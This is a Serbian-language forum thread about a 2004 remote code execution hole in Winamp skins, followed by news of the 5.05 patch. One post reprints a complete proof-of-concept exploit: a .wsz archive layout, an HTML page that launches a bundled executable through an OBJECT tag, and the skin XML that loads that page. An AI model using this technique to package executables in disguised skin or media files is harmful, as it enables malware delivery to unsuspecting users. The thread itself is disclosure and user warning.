Winamp skinovi - potencijalna opasnost

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Kako izvestava news.com a prenosi softpedia, Winamp-ov nacin ucitavanja skinova omogucava izvrsenje podmetnutog izvrsnog fajla. Vise Procitajte na: http://news.softpedia.com/news/2/2004/August/9429.shtml

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Pitao sam se da li će iko reagovati na to... "pokretanjem skin-a" se on samo iskopira tamo gde treba sa sve njegovim sadržajem, a iako je to u stvari zip arhiva raspakuje se korišćenjem istog.

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Da je samo kopiranje .. možda to ne bi bio veći broblem .. ali se radi i o pokretanju istog ..

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Winamp <=5.04 Skin File (.wsz) Remote Code Execution Exploit



This 0day exploit is known to be circulating in the wild
There is no patch for this vulnerability -> Do not use Winamp !


skinhead.wsz (skinhead.zip)
-----------------------------
/frame/
/maki/
/shade/
/html/
/html/file.exe (malicious file to execute)
/html/test.htm (html to load the .exe)
/player/
/player/Thumbs.db
/xml/
/xml/includes.xml
/xml/player-normal.xml
/xml/player.xml
/skin.xml


/html/test.htm
----------------
<html>
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'>
</html>


/xml/includes.xml
-------------------
<include file="player.xml"/>


/xml/player-normal.xml
-------------------------
<layout>
<browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" />
</layout>


/xml/player.xml
-----------------
<container id="main" name="main">
<include file="player-normal.xml"/>
</container>


/skin.xml
---------
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<WinampAbstractionLayer version="1.1">
<skininfo>
<version>1.0</version>
<name>Batman</name>
<comment></comment>
<author>Petrol Designs</author>
<email>info@petroldesigns.com</email>
<homepage>http://www.petroldesigns.com</homepage>
</skininfo>

<include file="xml/includes.xml"/>
<!--
-->
</WinampAbstractionLayer>


• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

AxeZ ::
There is no patch for this vulnerability -> Do not use Winamp !


Ma super ... kako da ga ne koristim.
Resenje : ne instalirati skinove.

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

From:
K-OTiK Security <Special-Alerts@k-otik.com>


To:
bugtraq@securityfocus.com


Date:
Today 03:56:12 pm

In-Reply-To: <20040826164943.17362.qmail@www.securityfocus.com>

Nullsoft has issued a fix for this critical vulnerability affecting Winamp 3.0, 5.0 and 5.0 Pro or newer.

Nullsoft said that Winamp 5.05 resolves this exploit in two ways:

- Winamp will now prompt all users with a confirmation window before installing any skins.
- Winamp will now only extract files considered low risk before loading a Winamp Skin.

ALL Winamp users MUST upgrade to Winamp 5.05 immediately.

http://www.winamp.com/player/

Regards.
K-OTik.COM Security Survey Team
http://www.k-otik.com

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Postoji puno alternativa, nego ljudi navikli na "Winamp" pa to ti je.

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Mislim da najmanje 60 % korisnika Windows-a koristi Winamp...tako da ce biti tesko odvici se!!! U ostalom mozemo da koristimo Klasicni skin ili MODERN skin...tako da odvikavanje nije potrebno!